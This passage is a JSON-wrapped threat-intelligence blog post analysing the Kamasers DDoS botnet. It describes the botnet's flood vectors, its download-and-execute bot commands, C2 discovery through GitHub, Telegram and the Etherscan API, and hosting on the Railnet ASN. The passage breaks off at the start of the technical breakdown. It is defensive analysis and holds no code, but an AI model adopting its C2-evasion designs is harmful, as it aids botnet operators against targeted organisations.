{"id":19450,"date":"2026-03-25T10:20:25","date_gmt":"2026-03-25T10:20:25","guid":{"rendered":"\/cybersecurity-blog\/?p=19450"},"modified":"2026-03-27T09:07:17","modified_gmt":"2026-03-27T09:07:17","slug":"kamasers-technical-analysis","status":"publish","type":"post","link":"https:\/\/any.run\/cybersecurity-blog\/kamasers-technical-analysis\/","title":{"rendered":"Kamasers\u00a0Analysis: A Multi-Vector DDoS Botnet Targeting Organizations Worldwide\u00a0"},"content":{"rendered":"\n<p>DDoS attacks are no longer only an infrastructure problem. They can quickly turn into a <strong>business issue<\/strong>, affecting uptime, customer experience, and operational stability. Kamasers is a strong example of this new reality, with broad attack capabilities and resilient command-and-control mechanisms that allow it to remain active under pressure.<\/p>\n\n\n\n<p>Let\u2019s explore the Kamasers botnet through both <strong>technical and <a href=\"https:\/\/any.run\/features\/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=kamasers-technical-analysis&amp;utm_term=250326&amp;utm_content=linktosandboxlanding\" target=\"_blank\" rel=\"noreferrer noopener\">behavioral analysis<\/a><\/strong>, looking at the commands it receives, the geographic distribution of its attacks, and the functions implemented in the malware sample. 
Together, these elements help reveal how Kamasers operates and why it poses a serious threat to organizations worldwide.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Key Takeaways&nbsp;<\/h2>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Kamasers&nbsp;is a sophisticated&nbsp;<strong>DDoS botnet<\/strong>&nbsp;that supports both&nbsp;application-layer and transport-layer attacks, including HTTP, TLS, UDP, TCP, and&nbsp;GraphQL-based flooding.&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>The malware can also act as a <strong>loader<\/strong>, downloading and executing additional payloads, which raises the risk of <strong>further compromise, data theft, and ransomware deployment<\/strong>.<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Its&nbsp;<strong>C2 infrastructure is resilient<\/strong>, using a&nbsp;Dead Drop Resolver (DDR)&nbsp;through legitimate public services such as&nbsp;GitHub Gist, Telegram, Dropbox, Bitbucket, and even&nbsp;Etherscan&nbsp;to retrieve&nbsp;active C2 addresses.&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Analysis showed that the&nbsp;<strong>Railnet&nbsp;ASN<\/strong>&nbsp;repeatedly appeared in malicious activity tied to multiple malware families, making it a notable infrastructure element in the broader threat landscape.&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Kamasers&nbsp;was&nbsp;observed&nbsp;being distributed through&nbsp;<strong>GCleaner<\/strong>&nbsp;and&nbsp;<strong>Amadey<\/strong>, showing that it fits into established malware delivery chains.&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>The botnet\u2019s activity is <strong>international<\/strong>, with strong submission visibility in <strong>Germany and the United States<\/strong>, while targeting extends across sectors including <strong>education, telecom, and technology<\/strong>.<\/li>\n<\/ul>\n\n\n\n<h2 class=\"wp-block-heading\">The Business Risk 
Behind&nbsp;Kamasers&nbsp;<\/h2>\n\n\n\n<p>Kamasers&nbsp;is a flexible attack platform that can turn compromised enterprise systems into operational liabilities, external attack infrastructure, and potential entry points for deeper compromise:&nbsp;<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>Corporate infrastructure can be turned against others:<\/strong>&nbsp;Infected enterprise systems may be used to launch DDoS attacks on third parties, creating reputational, contractual, and even legal risk for the organization.&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>A broader incident can follow quickly:<\/strong>&nbsp;Because&nbsp;Kamasers&nbsp;can function as a loader, a single infection may lead to&nbsp;additional&nbsp;payload delivery, raising the risk of data theft, ransomware, and deeper intrusion.&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>Visibility gaps become harder to defend:<\/strong>&nbsp;The malware uses legitimate public services to retrieve C2 information, making malicious communication more difficult to detect and increasing the chance of delayed response.&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>Response costs rise fast:<\/strong>&nbsp;Investigating infected hosts,&nbsp;validating&nbsp;external impact, restoring systems, and handling&nbsp;possible IP&nbsp;blacklisting can create significant operational and financial strain.&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>Business trust can be affected early:<\/strong>&nbsp;If company&nbsp;infrastructure is linked to malicious traffic, customers, partners, and providers may react before the full incident is even understood.&nbsp;<\/li>\n<\/ul>\n\n\n\n<p>Kamasers&nbsp;highlights a serious enterprise risk:&nbsp;attackers can use resilient C2 discovery, flexible attack methods, and follow-on payload delivery to turn a single compromise into an incident with operational, financial, compliance, and 
reputational consequences.&nbsp;<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Kamasers&nbsp;Threat&nbsp;Overview&nbsp;<\/h2>\n\n\n\n<p>Kamasers&nbsp;is a malware botnet family designed to carry out DDoS attacks using both application-layer and transport-layer vectors. It supports HTTP GET\/POST floods, API-targeted attacks, defense evasion techniques, TLS handshake exhaustion, connection-holding methods, as well as UDP and TCP floods. 
Infected nodes receive commands from the command-and-control infrastructure and generate&nbsp;the corresponding&nbsp;traffic. In addition,&nbsp;Kamasers&nbsp;can also function as a loader, downloading and executing files from the network.&nbsp;<\/p>\n\n\n\n<p><a href=\"https:\/\/any.run\/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=kamasers-technical-analysis&amp;utm_term=250326&amp;utm_content=linktolanding\" target=\"_blank\" rel=\"noreferrer noopener\">ANY.RUN<\/a>&nbsp;previously observed activity associated with&nbsp;<a href=\"https:\/\/x.com\/anyrun_app\/status\/2001261257966412087?s=20\" target=\"_blank\" rel=\"noreferrer noopener\"><strong>Udados<\/strong><\/a>, which is&nbsp;most likely an&nbsp;evolution or updated version of&nbsp;Kamasers. As such,&nbsp;Udados&nbsp;can be considered part of the&nbsp;Kamasers&nbsp;family.&nbsp;<\/p>\n\n\n\n<p>You can find public&nbsp;<a href=\"https:\/\/any.run\/features\/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=kamasers-technical-analysis&amp;utm_term=250326&amp;utm_content=linktosandboxlanding\" target=\"_blank\" rel=\"noreferrer noopener\">sandbox&nbsp;analysis<\/a>&nbsp;sessions related to the&nbsp;Kamasers&nbsp;family&nbsp;with the following Threat Intelligence&nbsp;Lookup&nbsp;query:&nbsp;<\/p>\n\n\n\n<p><a href=\"https:\/\/intelligence.any.run\/analysis\/lookup?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=kamasers-technical-analysis&amp;utm_term=250326&amp;utm_content=linktolookup#{%22query%22:%22threatName:%5C%22kamasers%5C%22%22,%22dateRange%22:30}\" target=\"_blank\" rel=\"noreferrer noopener\">threatName:&#8221;kamasers&#8221;<\/a>&nbsp;<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"446\" src=\"\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/Screenshot-2026-03-24-at-19.16.58-1024x446.png\" alt=\"ANY.RUN\u2019s\u00a0sandbox\u00a0sessions related to 
the\u00a0Kamasers\u00a0attacks\" class=\"wp-image-19465\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/Screenshot-2026-03-24-at-19.16.58-1024x446.png 1024w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/Screenshot-2026-03-24-at-19.16.58-300x131.png 300w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/Screenshot-2026-03-24-at-19.16.58-768x334.png 768w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/Screenshot-2026-03-24-at-19.16.58-1536x669.png 1536w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/Screenshot-2026-03-24-at-19.16.58-2048x892.png 2048w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/Screenshot-2026-03-24-at-19.16.58-370x161.png 370w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/Screenshot-2026-03-24-at-19.16.58-270x118.png 270w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/Screenshot-2026-03-24-at-19.16.58-740x322.png 740w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><figcaption class=\"wp-element-caption\"><em>ANY.RUN\u2019s&nbsp;sandbox&nbsp;sessions related to the&nbsp;Kamasers&nbsp;attacks displayed inside TI&nbsp;Lookup<\/em><\/figcaption><\/figure><\/div>\n\n\n<p>If a corporate host becomes part of a botnet and is used to carry out DDoS attacks, the organization may face financial risks related to incident response, system recovery, network costs, and potential contractual penalties, as well as regulatory scrutiny if inadequate security measures are identified, especially in cases involving data compromise.&nbsp;<\/p>\n\n\n\n<p>An&nbsp;additional&nbsp;risk stems from the malware\u2019s ability to act as a loader, downloading and executing third-party payloads. 
This increases the likelihood of further intrusion, data exfiltration, ransomware deployment, and the resulting operational and reputational damage.&nbsp;<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">C2 and Infrastructure&nbsp;&nbsp;<\/h2>\n\n\n\n<p>As part of the analysis, it was&nbsp;observed&nbsp;that the bot received the !httpbypass&nbsp;control command, which&nbsp;initiates&nbsp;an HTTP flood attack against a specified URL with defined intensity and duration parameters.&nbsp;After completing the attack, the bot reported its status and returned to standby mode.&nbsp;<\/p>\n\n\n\n<p><a href=\"https:\/\/app.any.run\/tasks\/232034c5-de22-4eb4-a3ab-62e58d041205?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=kamasers-technical-analysis&amp;utm_term=250326&amp;utm_content=linktoservice\" target=\"_blank\" rel=\"noreferrer noopener\">View analysis session<\/a>&nbsp;<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large is-resized\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"901\" src=\"\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image2-2-1024x901.png\" alt=\"Communication between the infected host and the C2 server\" class=\"wp-image-19467\" style=\"width:516px;height:auto\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image2-2-1024x901.png 1024w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image2-2-300x264.png 300w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image2-2-768x676.png 768w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image2-2-370x326.png 370w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image2-2-270x238.png 270w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image2-2-740x651.png 740w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image2-2.png 1432w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" 
\/><figcaption class=\"wp-element-caption\"><em>Communication between the infected host and the C2 server<\/em>&nbsp;<\/figcaption><\/figure><\/div>\n\n\n<p>In the&nbsp;sandbox&nbsp;analysis&nbsp;session,&nbsp;we can see how&nbsp;a&nbsp;DDoS attack targets&nbsp;a domain:&nbsp;<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"236\" src=\"\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image3-1-1024x236.png\" alt=\"DDoS attack targeting a domain, exposed inside\u00a0ANY.RUN\u00a0sandbox\u00a0\" class=\"wp-image-19468\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image3-1-1024x236.png 1024w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image3-1-300x69.png 300w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image3-1-768x177.png 768w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image3-1-1536x355.png 1536w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image3-1-370x85.png 370w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image3-1-270x62.png 270w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image3-1-740x171.png 740w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image3-1.png 1732w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><figcaption class=\"wp-element-caption\"><em>DDoS attack targeting a domain, exposed inside&nbsp;ANY.RUN&nbsp;sandbox<\/em>&nbsp;<\/figcaption><\/figure><\/div>\n\n\n<p>In a number of&nbsp;analysis&nbsp;sessions, the command-and-control server was used not only to coordinate DDoS activity, but also to deliver additional payloads.&nbsp;Specifically, the bot received&nbsp;the&nbsp;<em>!download<\/em> command, after which it downloaded and executed a file from an external domain, then confirmed successful&nbsp;session&nbsp;completion to 
the C2 server:&nbsp;<\/p>\n\n\n\n<p><a href=\"https:\/\/app.any.run\/tasks\/2127c60a-1cfa-4c40-aa97-b6a68491a1d9?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=kamasers-technical-analysis&amp;utm_term=250326&amp;utm_content=linktoservice\" target=\"_blank\" rel=\"noreferrer noopener\">View analysis session<\/a>&nbsp;<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large is-resized\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"875\" src=\"\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image4-1024x875.png\" alt=\"Example of a C2 command used to download a malicious file\" class=\"wp-image-19469\" style=\"width:528px;height:auto\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image4-1024x875.png 1024w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image4-300x256.png 300w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image4-768x656.png 768w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image4-370x316.png 370w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image4-270x231.png 270w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image4-740x632.png 740w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image4.png 1444w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><figcaption class=\"wp-element-caption\"><em>Example of a C2 command used to download a malicious file<\/em><\/figcaption><\/figure><\/div>\n\n\n<p>In one observed case, the bot received the<em>&nbsp;!descargar<\/em>&nbsp;command,&nbsp;the Spanish-language equivalent&nbsp;of&nbsp;<em>!download,<\/em>&nbsp;to retrieve an executable file from an external domain.&nbsp;<\/p>\n\n\n\n<p><a 
href=\"https:\/\/app.any.run\/tasks\/80effde1-3534-4cf8-8f85-fdd12e3fb163?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=kamasers-technical-analysis&amp;utm_term=250326&amp;utm_content=linktoservice\" target=\"_blank\" rel=\"noreferrer noopener\">View analysis session with&nbsp;C2 command in Spanish<\/a>&nbsp;<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large is-resized\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"497\" src=\"\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image5-3-1024x497.png\" alt=\"C2 command in Spanish used to download a malicious file\" class=\"wp-image-19470\" style=\"width:618px;height:auto\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image5-3-1024x497.png 1024w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image5-3-300x146.png 300w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image5-3-768x373.png 768w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image5-3-370x180.png 370w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image5-3-270x131.png 270w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image5-3-740x359.png 740w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image5-3.png 1426w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><figcaption class=\"wp-element-caption\"><em>C2 command in Spanish used to download a malicious file&nbsp;observed&nbsp;inside&nbsp;ANY.RUN&nbsp;sandbox<\/em><\/figcaption><\/figure><\/div>\n\n\n<p>In some cases, the&nbsp;Kamasers&nbsp;botnet was&nbsp;observed&nbsp;using public blockchain infrastructure as an auxiliary mechanism for obtaining the C2 address. 
Specifically, infected hosts queried the&nbsp;<strong>Etherscan&nbsp;API<\/strong> (api.etherscan.io) to retrieve data&nbsp;containing&nbsp;the URL of the command-and-control server:&nbsp;<\/p>\n\n\n\n<p><a href=\"https:\/\/app.any.run\/tasks\/0c910c38-531d-4df4-86b9-19902487edc3?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=kamasers-technical-analysis&amp;utm_term=250326&amp;utm_content=linktoservice\" target=\"_blank\" rel=\"noreferrer noopener\">View session querying the&nbsp;Etherscan&nbsp;API<\/a>&nbsp;<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"332\" src=\"\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image6-1024x332.png\" alt=\"Querying the\u00a0Etherscan\u00a0API\u00a0(api.etherscan.io) to retrieve data\" class=\"wp-image-19471\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image6-1024x332.png 1024w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image6-300x97.png 300w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image6-768x249.png 768w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image6-1536x498.png 1536w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image6-2048x664.png 2048w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image6-370x120.png 370w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image6-270x87.png 270w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image6-740x240.png 740w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><figcaption class=\"wp-element-caption\"><em>Querying the&nbsp;Etherscan&nbsp;API&nbsp;(api.etherscan.io) to retrieve data<\/em><\/figcaption><\/figure><\/div>\n\n\n<p>After obtaining the URL, the bot connects to the C2 server and sends information about its ID, command execution status, bot version, 
privileges on the infected host, C2 discovery source, and system information:&nbsp;<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"603\" src=\"\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image7-1-1024x603.png\" alt=\"Victim request to the C2 server\u00a0\" class=\"wp-image-19472\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image7-1-1024x603.png 1024w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image7-1-300x177.png 300w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image7-1-768x453.png 768w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image7-1-370x218.png 370w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image7-1-270x159.png 270w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image7-1-740x436.png 740w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image7-1.png 1422w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><figcaption class=\"wp-element-caption\"><em>Victim request to the C2 server<\/em>&nbsp;<\/figcaption><\/figure><\/div>\n\n\n<p>In&nbsp;a number of&nbsp;cases,&nbsp;Kamasers&nbsp;uses public services, including&nbsp;<strong>GitHub<\/strong>, as an auxiliary source of configuration:&nbsp;<\/p>\n\n\n\n<p><a href=\"https:\/\/app.any.run\/tasks\/1d4d2a6f-38de-4e5d-bf86-a1a66857aff1?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=kamasers-technical-analysis&amp;utm_term=250326&amp;utm_content=linktoservice\" target=\"_blank\" rel=\"noreferrer noopener\">Check&nbsp;how Kamasers uses public services<\/a>&nbsp;<\/p>\n\n\n\n<p>Behavioral analysis of Kamasers showed that the botnet frequently establishes connections to IP addresses associated with <strong>Railnet LLC\u2019s ASN<\/strong>.<\/p>\n\n\n\n<p><strong>Railnet<\/strong>&nbsp;is regularly mentioned in public reporting as a legitimate front for the hosting&nbsp;provider <strong>Virtualine<\/strong>. 
This provider is known for the absence of KYC procedures, and some research has noted that the associated infrastructure is used to host malicious services and&nbsp;facilitate&nbsp;attacks.&nbsp;<\/p>\n\n\n\n<p>Railnet&nbsp;infrastructure has previously been&nbsp;observed&nbsp;in campaigns targeting both government and private-sector organizations across several European countries, including Switzerland, Germany, Ukraine, Poland, and France.&nbsp;<\/p>\n\n\n\n<p>There are also documented cases of&nbsp;<strong>Railnet<\/strong>&nbsp;infrastructure being used to distribute other malware families, including&nbsp;<strong>Latrodectus<\/strong>, which&nbsp;a number of&nbsp;reports link to activity associated with groups such as&nbsp;<strong>TA577<\/strong>.&nbsp;<\/p>\n\n\n\n<p>At the time of analysis,&nbsp;<strong>ANY.RUN<\/strong>&nbsp;data showed that&nbsp;<strong>Railnet\u2019s&nbsp;ASN<\/strong>&nbsp;consistently appeared in reports tied to a wide range of malicious activity and was being used by multiple malware families. These were not isolated incidents, but a recurring pattern: the same ASN was repeatedly involved across different campaigns, making it a convenient infrastructure hub for threat actors.&nbsp;<\/p>\n\n\n\n<p>The current picture of&nbsp;<strong>Railnet<\/strong>&nbsp;activity can be quickly verified using&nbsp;<a href=\"https:\/\/any.run\/threat-intelligence-lookup\/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=kamasers-technical-analysis&amp;utm_term=250326&amp;utm_content=linktotilookuplanding\" target=\"_blank\" rel=\"noreferrer noopener\"><strong>ANY.RUN\u2019s&nbsp;Threat Intelligence&nbsp;Lookup<\/strong><\/a>. 
Searching by ASN makes it possible to assess how extensively it is involved in malicious chains, which malware families interact with it, and how the nature of that activity changes over time:&nbsp;<\/p>\n\n\n\n<p><a href=\"https:\/\/intelligence.any.run\/analysis\/lookup?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=kamasers-technical-analysis&amp;utm_term=250326&amp;utm_content=linktolookup#{%22query%22:%22destinationIpAsn:%5C%22railnet%5C%22%22,%22dateRange%22:180}\" target=\"_blank\" rel=\"noreferrer noopener\">destinationIpAsn:&#8221;railnet&#8221;<\/a>&nbsp;<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"391\" src=\"\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/railnet_1-1024x391.png\" alt=\"\" class=\"wp-image-19492\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/railnet_1-1024x391.png 1024w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/railnet_1-300x114.png 300w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/railnet_1-768x293.png 768w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/railnet_1-1536x586.png 1536w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/railnet_1-370x141.png 370w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/railnet_1-270x103.png 270w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/railnet_1-740x282.png 740w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/railnet_1.png 1824w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><figcaption class=\"wp-element-caption\"><em>Query for RAILNET ASN in&nbsp;ANY.RUN\u2019s TI&nbsp;Lookup<\/em>&nbsp;<\/figcaption><\/figure><\/div>\n\n\n<p>In the analyzed sandbox sessions, Kamasers was distributed via <strong>GCleaner<\/strong> and <strong>Amadey<\/strong>, a delivery pattern that 
has also been observed in other DDoS campaigns.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Attack Geography and Targeting&nbsp;<\/h2>\n\n\n\n<p>Among the observed&nbsp;<strong>DDoS<\/strong>&nbsp;targets were companies in the&nbsp;<strong>LATAM<\/strong>&nbsp;region. However, according to&nbsp;<strong>ANY.RUN\u2019s&nbsp;threat&nbsp;intelligence&nbsp;<\/strong>data, the targeting profile is broader: the education sector is affected most often, along with telecommunications and technology organizations.&nbsp;<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"555\" src=\"\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/kamasers_2-1024x555.png\" alt=\"\" class=\"wp-image-19493\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/kamasers_2-1024x555.png 1024w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/kamasers_2-300x163.png 300w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/kamasers_2-768x416.png 768w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/kamasers_2-1536x832.png 1536w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/kamasers_2-370x200.png 370w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/kamasers_2-270x146.png 270w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/kamasers_2-740x401.png 740w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/kamasers_2.png 1822w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><figcaption class=\"wp-element-caption\"><em>Query in&nbsp;ANY.RUN&nbsp;TI to search for the&nbsp;Kamasers&nbsp;malware family<\/em>&nbsp;<\/figcaption><\/figure><\/div>\n\n\n<p>By geographic distribution of observed submissions, the largest share comes from&nbsp;<strong>Germany<\/strong>&nbsp;and the&nbsp;<strong>United States<\/strong>, with separate cases also 
recorded in&nbsp;<strong>Poland<\/strong>&nbsp;and other countries. During the analysis, control commands in&nbsp;<strong>Spanish<\/strong>&nbsp;were also&nbsp;observed. This may indirectly suggest that the botnet originated from, or evolved within, a Spanish-speaking operator environment, although its actual activity is clearly international in scope.&nbsp;<\/p>\n\n\n\n<p>It is also important to consider that the botnet uses the infrastructure of infected hosts to carry out attacks. If corporate systems are compromised, the organization may not only become a potential target itself, but also inadvertently serve as a source of attacks against third parties. This creates reputational risks, the possibility of IP address blacklisting, and&nbsp;additional&nbsp;financial costs related to investigation and infrastructure recovery.&nbsp;<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Technical&nbsp;Breakdown of&nbsp;Kamasers&nbsp;<\/h2>\n\n\n\n<p>To better understand the Kamasers botnet architecture, a detailed sample analysis was conducted. 
The starting point was the sample from this <a href=\"https:\/\/any.run\/features\/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=kamasers-technical-analysis&amp;utm_term=250326&amp;utm_content=linktosandboxlanding\" target=\"_blank\" rel=\"noreferrer noopener\"><strong>ANY.RUN sandbox<\/strong><\/a> session:<\/p>\n\n\n\n<p><a href=\"https:\/\/app.any.run\/tasks\/04a02053-2d1a-44db-bbcb-ef03d66f941f?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=kamasers-technical-analysis&amp;utm_term=250326&amp;utm_content=linktoservice\" target=\"_blank\" rel=\"noreferrer noopener\"><strong>Check analysis session<\/strong><\/a>&nbsp;<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"576\" src=\"\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/sandbox_analysis_kamasers-1024x576.png\" alt=\"\" class=\"wp-image-19494\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/sandbox_analysis_kamasers-1024x576.png 1024w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/sandbox_analysis_kamasers-300x169.png 300w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/sandbox_analysis_kamasers-768x432.png 768w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/sandbox_analysis_kamasers-1536x864.png 1536w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/sandbox_analysis_kamasers-370x208.png 370w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/sandbox_analysis_kamasers-270x152.png 270w, 